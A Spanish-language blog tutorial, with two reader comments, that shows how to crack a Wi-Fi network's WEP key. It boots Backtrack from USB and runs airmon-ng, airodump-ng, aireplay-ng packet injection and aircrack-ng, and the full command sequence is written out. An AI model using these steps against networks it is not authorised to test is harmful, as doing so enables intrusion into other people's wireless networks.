Remember, with great power. comes great responsibility.Yo hice la prueba con mi MODEM-router 2Wire y funcionó después de unas 2 horas; después del video están las instrucciones por escrito.
Si no queremos instalar el Backtrack en una partición del disco duro, reiniciamos la computadora que pretendemos usar y en el menú del BIOS verificamos que podemos arrancar la computadora desde un puerto USB.
Posteriormente descargamos la imagen ISO del sistema operativo Backtrack, y descargamos la herramienta UNetBootin, que nos va a servir para instalar el backtrack en un flash drive (pen drive, o memoria USB). El fash drive debe estar formateado en FAT o FAT32 para que podamos usarlo como arranque. Ejecutamos el UNetBootin y seleccionamos la imagen ISO y el Flash Drive deseados, completamos el proceso de instalación y reiniciamos la computadora para utilizar la nueva imagen.
Una vez que termine de cargar vamos a escribir para iniciar la interfase gráfica:
startxAbrimos una consola e iniciamos los servicios de red:
/etc/init.d/networking startaquí es donde inicia el trabajo sobre la red con la herramienta airmon-ng, primero vemos el status de nuestra tarjeta de red, que usualmente es wlan0, y después vamos a detenerla para iniciar la interfase virtual creada, usualmente mon0 y verificamos el status nuevamente:
airmon-ngAhora vamos a iniciar la captura de paquetes desde la interfase con airodump-ng, pero primero vamos a ver todas las redes que se pueden detectar y cual tiene un cifrado WEP, posteriormente lo detemos (ctrl+C) e iniciamos nuevamente la herramienta para capturar paquetes (el bssid de la red es la dirección MAC asociada a la red o el access-point):
airmon-ng stop [wlan0]
airmon-ng start [mon0]
airmon-ng
airodump-ng [mon0]Abrimos una segunda consola y usando la herramienta aireplay-ng vamos a asociar nuestra tarjeta wireless al access-point deseado; después de este comando debemos tener un mensaje de que la asociación fue exitosa y no volvemos a moverle:
ctrl C
airodump-ng -w wep -c [channel number] --bssid [bssid number] [mon0]
aireplay-ng -1 0 -a [bssid] [mon0]Abrimos una tercera consola y vamos a inyectar paquetes a esa MAC address, y vamos a estar capturando las respuestas con el airodump-ng que está activo en la primera consola y vamos a ver que se capturen al menos 30,000 paquetes (unas 2 o 3 horas, dependiendo de que tan buena señal tenemos de la red):
aireplay-ng -3 -b [bssid] [mon0]
Y después de unas dos horas vamos a la 1a consola a ver si tenemos los 30mil paquetes o más y de ser así detenemos la captura, pedimos el directorio y ejecutamos aircrack-ng que es la herramienta que decodifica la clave WEP y la escribimos;
control CEscribimos la clave que nos proporciona la herramienta y listo, ya tenemos el ID de la red y la clave WEP.
dir
aircrack-ng [filename].cap (usualmente es wep-01.cap)
esta bueno amigo voy a probarlo__Rub21
ResponderBorrarFelicidades por el post, en general he revisado algunos y son bastante sencillos de entender,gracias por el tiempo q dedicas a estos posts.
ResponderBorrar